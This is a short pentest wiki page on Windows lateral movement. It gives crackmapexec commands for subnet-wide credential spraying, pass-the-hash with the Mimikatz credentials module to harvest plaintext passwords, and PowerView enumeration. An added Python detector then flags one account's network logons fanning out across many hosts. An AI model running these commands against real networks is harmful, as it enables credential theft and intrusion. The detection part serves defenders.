Lateral Movement


To check whether the credentials $USER / $PASSWORD are also valid on other computers in the network:

$ crackmapexec $IP/24 -u $USER -p $PASSWORD --lusers

Or use an Administrator hash and run Mimikatz to gather plaintext passwords:

$ crackmapexec $IP/24 -u Administrator -H $HASH -d $DOMAIN -m modules/credentials/

Run PowerView commands through crackmapexec:

$ crackmapexec smb $IP -d $DOMAIN -u $LOGIN -p $PASS -M powerview -o COMMAND="Get-NetDomain" --verbose
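
On the defender's side, the subnet-wide credential checks above leave one account authenticating from one source to many hosts within seconds, visible as Windows Security events 4624/4625 with LogonType 3. The following is an added example, not part of the original page: a sliding-window detector over normalized logon events. The field names (ts, account, src_ip, dest_host), the thresholds and the sample events are assumptions constructed for illustration.

```python
from collections import defaultdict

NETWORK_LOGON = 3               # LogonType 3 = network logon (SMB and similar)
LOGON_EVENT_IDS = {4624, 4625}  # Windows Security: logon success / logon failure

def detect_fanout(events, window_s=300, min_hosts=5):
    """Return [(account, src_ip, n_hosts)] for each account/source pair that
    reached >= min_hosts distinct hosts within any window_s-second window."""
    by_key = defaultdict(list)
    for e in events:
        if e["event_id"] in LOGON_EVENT_IDS and e["logon_type"] == NETWORK_LOGON:
            by_key[(e["account"], e["src_ip"])].append((e["ts"], e["dest_host"]))

    alerts = []
    for (account, src_ip), hits in by_key.items():
        hits.sort()
        best, start = 0, 0
        for end in range(len(hits)):
            # Advance the left edge until the window spans at most window_s seconds.
            while hits[end][0] - hits[start][0] > window_s:
                start += 1
            best = max(best, len({host for _, host in hits[start:end + 1]}))
        if best >= min_hosts:
            alerts.append((account, src_ip, best))
    return sorted(alerts)

def _ev(ts, event_id, account, src_ip, dest_host, logon_type=NETWORK_LOGON):
    # Helper (hypothetical schema): build one normalized event record.
    return {"ts": ts, "event_id": event_id, "logon_type": logon_type,
            "account": account, "src_ip": src_ip, "dest_host": dest_host}

# Constructed sample data: one sweep across 8 hosts, plus ordinary user activity.
SAMPLE_EVENTS = (
    [_ev(1000 + i * 2, 4624 if i % 2 else 4625, "svc_backup", "10.0.0.50", f"WS{i:02d}")
     for i in range(8)]
    + [_ev(1000, 4624, "alice", "10.0.0.21", "FS01"),
       _ev(4000, 4624, "alice", "10.0.0.21", "PRINT01"),
       _ev(1005, 4624, "svc_backup", "10.0.0.50", "WS00", logon_type=2)]  # interactive, ignored
)

if __name__ == "__main__":
    for account, src_ip, n_hosts in detect_fanout(SAMPLE_EVENTS):
        print(f"ALERT {account} from {src_ip}: {n_hosts} hosts within window")
```

Failures are counted together with successes because a sweep with one credential succeeds only where that credential is valid and fails everywhere else.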

Other lateral movement techniques are described under Category:Lateral Movement.